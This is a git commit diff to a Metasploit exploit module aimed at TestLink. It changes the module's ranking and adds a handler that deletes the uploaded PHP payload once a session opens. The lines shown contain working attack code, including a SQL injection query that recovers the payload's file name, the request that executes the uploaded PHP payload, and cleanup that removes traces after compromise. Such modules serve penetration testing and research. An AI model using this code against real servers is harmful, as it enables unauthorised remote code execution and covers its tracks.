ranking changed plus on_new_session handler added

2012-08-13 19:29:13 +02:00 · 2012-08-13 19:29:13 +02:00 · d6b28dc44d
parent 468030786f
commit d6b28dc44d
1 changed files with 18 additions and 8 deletions
--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@ -8,7 +8,7 @@
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
-	Rank = GreatRanking
+	Rank = ExcellentRanking

 	include Msf::Exploit::Remote::HttpClient

@ -131,6 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote

 	end

+	def on_new_session(client)
+		if client.type == "meterpreter"
+			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+			client.fs.file.rm("#{@token}.php")
+		else
+			client.shell_command_token("rm #{@token}.php")
+		end
+	end
+
+
 	def exploit

 		base  = target_uri.path
@ -205,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				'uri'    => "#{base}upload_area/#{table}/#{id}/"
 			})
 			if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
-				token = $1
-				print_good("#{@peer} - Successfully retrieved file name (#{token})")
+				@token = $1
+				print_good("#{@peer} - Successfully retrieved file name (#{@token})")
 			else
 				print_error("#{@peer} - Could not retrieve file name from directory index.")
 			end
@ -217,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end

 		# attempt to retrieve real file name from the database
-		if token.nil?
+		if @token.nil?
 			print_status("#{@peer} - Retrieving real file name from the database.")
 			sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
 			begin
@ -227,8 +237,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					'cookie' => datastore['COOKIE'],
 				})
 				if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
-					token = $1
-					print_good("#{@peer} - Successfully retrieved file name (#{token})")
+					@token = $1
+					print_good("#{@peer} - Successfully retrieved file name (#{@token})")
 				else
 					print_error("#{@peer} - Could not retrieve file name from the database.")
 					return
@ -240,11 +250,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		end

 		# retrieve and execute PHP payload
-		print_status("#{@peer} - Executing payload (#{token}.php)")
+		print_status("#{@peer} - Executing payload (#{@token}.php)")
 		begin
 			send_request_cgi({
 				'method' => 'GET',
-				'uri'    => "#{base}upload_area/nodes_hierarchy/#{id}/#{token}.php"
+				'uri'    => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
 			})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			print_error("#{@peer} - Connection failed")